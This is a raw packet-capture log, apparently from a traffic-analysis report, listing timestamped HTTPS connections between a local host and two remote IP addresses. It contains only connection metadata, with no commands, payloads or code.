                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:52.207432032 CET44349796108.158.75.93192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:52.207456112 CET49796443192.168.2.7108.158.75.93
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:52.207492113 CET49796443192.168.2.7108.158.75.93
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:15:52.207977057 CET49796443192.168.2.7108.158.75.93
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:32.967936039 CET49900443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:32.967988968 CET4434990013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:32.968048096 CET49900443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:32.969643116 CET49900443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:32.969660997 CET4434990013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:35.416028023 CET4434990013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:35.451009989 CET49900443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:35.451041937 CET4434990013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:35.988128901 CET4434990013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:35.988313913 CET4434990013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:35.988404036 CET49900443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:36.025764942 CET49900443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:36.026633978 CET49910443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:36.026683092 CET4434991013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:36.026761055 CET49910443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:36.027008057 CET49910443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:36.027026892 CET4434991013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:38.402417898 CET4434991013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:38.415159941 CET49910443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:38.415184975 CET4434991013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:38.938438892 CET4434991013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:38.938620090 CET4434991013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:38.938694000 CET49910443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:39.051995993 CET49910443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:43.938297987 CET4434979413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:43.938327074 CET4434979413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:43.938533068 CET49794443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:43.938544035 CET4434979413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:43.939122915 CET49794443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:43.939198017 CET4434979413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:43.939263105 CET49794443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:43.945894003 CET49931443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:43.945924044 CET4434993113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:43.945996046 CET49931443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:43.947683096 CET49932443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:43.947712898 CET4434993213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:43.947784901 CET49932443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:43.947988033 CET49932443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:43.948003054 CET4434993213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:43.948209047 CET49931443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:43.948219061 CET4434993113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:46.267520905 CET4434993213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:46.267602921 CET49932443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:46.270538092 CET49932443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:46.270543098 CET4434993213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:46.270767927 CET4434993213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:46.275458097 CET49932443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:46.323327065 CET4434993213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:46.328371048 CET4434993113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:46.328438044 CET49931443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:46.330212116 CET49931443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:46.330224991 CET4434993113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:46.330463886 CET4434993113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:46.331379890 CET49931443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:46.375334978 CET4434993113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:46.853337049 CET4434993113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:46.853414059 CET4434993113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:46.853468895 CET49931443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:46.853949070 CET49931443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:50.799185991 CET49932443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:50.799276114 CET4434993213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:50.799341917 CET49932443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:50.815221071 CET49950443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:50.815241098 CET4434995013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:50.815295935 CET49950443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:50.816155910 CET49950443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:50.816181898 CET4434995013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:50.830729961 CET49952443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:50.830765009 CET4434995213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:50.830823898 CET49952443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:50.831039906 CET49952443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:50.831053019 CET4434995213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:53.214246035 CET4434995213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:53.215661049 CET49952443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:53.215676069 CET4434995213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:53.262518883 CET4434995013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:53.263772964 CET49950443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:53.263791084 CET4434995013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:53.737799883 CET4434995213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:53.737874985 CET4434995213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:53.737926006 CET49952443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:53.738492012 CET49952443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:53.838145018 CET4434995013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:53.883342028 CET49950443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:53.883363008 CET4434995013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:53.883851051 CET49950443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:53.883934975 CET4434995013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:53.884036064 CET49950443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:53.885137081 CET49963443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:53.885184050 CET4434996313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:53.885241985 CET49963443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:53.885570049 CET49963443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:53.885586023 CET4434996313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:56.259943962 CET4434996313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:56.260015011 CET49963443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:56.261840105 CET49963443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:56.261868954 CET4434996313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:56.262115955 CET4434996313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:56.263153076 CET49963443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:56.303338051 CET4434996313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:56.793868065 CET4434996313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:56.793942928 CET4434996313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:56.794020891 CET49963443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:56.794698000 CET49963443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:56.798239946 CET49971443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:56.798286915 CET4434997113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:56.798505068 CET49971443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:56.798711061 CET49971443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:56.798727036 CET4434997113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:56.799063921 CET49972443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:56.799094915 CET4434997213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:56.799185038 CET49972443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:56.799392939 CET49972443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:56.799408913 CET4434997213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.178982973 CET4434997113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.179713011 CET4434997213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.180946112 CET49972443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.180974007 CET4434997213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.181051970 CET49971443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.181077957 CET4434997113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.756829977 CET4434997113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.756891966 CET4434997113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.756934881 CET4434997213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.756982088 CET49971443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.757059097 CET4434997213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.757102966 CET49972443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.757116079 CET4434997213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.757128954 CET4434997213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.757185936 CET49972443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.757733107 CET49972443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.757750988 CET49971443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.765367031 CET49980443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.765381098 CET4434998013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.765439987 CET49980443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.766067028 CET49980443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.766078949 CET4434998013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.767362118 CET49981443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.767379045 CET4434998113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.767529011 CET49981443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.767728090 CET49981443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:16:59.767740011 CET4434998113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:01.541712046 CET49981443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:01.543229103 CET49988443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:01.543261051 CET4434998813.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:01.543364048 CET49988443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:01.543734074 CET49988443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:01.543745995 CET4434998813.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:01.583342075 CET4434998113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:02.140642881 CET4434998013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:02.145935059 CET4434998113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:02.146080971 CET4434998113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:02.146428108 CET49981443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:02.146429062 CET49981443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:02.196242094 CET49980443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:02.399660110 CET49980443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:02.399689913 CET4434998013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:02.925729990 CET4434998013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:02.925806046 CET4434998013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:02.925857067 CET49980443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:02.926408052 CET49980443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:02.927375078 CET49994443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:02.927417994 CET4434999413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:02.927552938 CET49994443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:02.927848101 CET49994443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:02.927861929 CET4434999413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:03.867429018 CET4434998813.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:03.867511034 CET49988443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:03.869775057 CET49988443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:03.869784117 CET4434998813.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:03.870018959 CET4434998813.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:03.874553919 CET49988443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:03.915333986 CET4434998813.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:04.434637070 CET4434998813.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:04.434705973 CET4434998813.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:04.434973001 CET49988443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:04.439694881 CET49988443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:04.440965891 CET49996443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:04.441013098 CET4434999613.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:04.441112995 CET49996443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:04.441454887 CET49996443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:04.441464901 CET4434999613.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:05.234679937 CET4434999413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:05.234750032 CET49994443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:05.236701965 CET49994443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:05.236713886 CET4434999413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:05.236958027 CET4434999413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:05.237935066 CET49994443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:05.244304895 CET49994443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:05.244343042 CET4434999413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:05.244456053 CET49994443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:05.245745897 CET50000443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:05.245785952 CET4435000013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:05.245866060 CET50000443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:05.246619940 CET50000443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:05.246643066 CET4435000013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:06.887623072 CET4434999613.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:06.930319071 CET49996443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:07.042136908 CET49996443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:07.042149067 CET4434999613.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:07.575186014 CET4434999613.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:07.575256109 CET4434999613.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:07.575421095 CET49996443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:07.576745987 CET49996443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:07.576751947 CET50009443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:07.576787949 CET4435000913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:07.581121922 CET50009443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:07.581394911 CET50009443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:07.581413031 CET4435000913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:07.617759943 CET4435000013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:07.617897987 CET50000443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:07.619554043 CET50000443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:07.619569063 CET4435000013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:07.619816065 CET4435000013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:07.621649981 CET50000443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:07.663333893 CET4435000013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.141820908 CET4435000013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.197046995 CET50000443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.197060108 CET4435000013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.197650909 CET50000443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.197741985 CET4435000013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.197854042 CET50000443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.370981932 CET50014443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.371015072 CET4435001413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.371090889 CET50014443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.371393919 CET50014443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.371414900 CET4435001413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.871529102 CET50014443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.872868061 CET50015443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.872914076 CET4435001513.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.873023033 CET50015443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.873421907 CET50015443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.873434067 CET4435001513.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.919341087 CET4435001413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.231437922 CET4435000913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.231571913 CET50009443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.234443903 CET50009443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.234457016 CET4435000913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.234770060 CET4435000913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.236299038 CET50009443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.279333115 CET4435000913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.340682983 CET50015443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.344743013 CET50022443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.344778061 CET4435002213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.345027924 CET50022443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.348634005 CET50022443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.348647118 CET4435002213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.383336067 CET4435001513.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.758620024 CET4435000913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.758711100 CET4435000913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.758776903 CET50009443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.759088039 CET4435001413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.759217024 CET50014443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.759217024 CET50014443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.759236097 CET4435001413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.759335041 CET50014443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.759516001 CET50009443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.760379076 CET50023443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.760413885 CET4435002313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.760483980 CET50023443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.761054039 CET50023443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.761069059 CET4435002313.232.67.198192.168.2.7
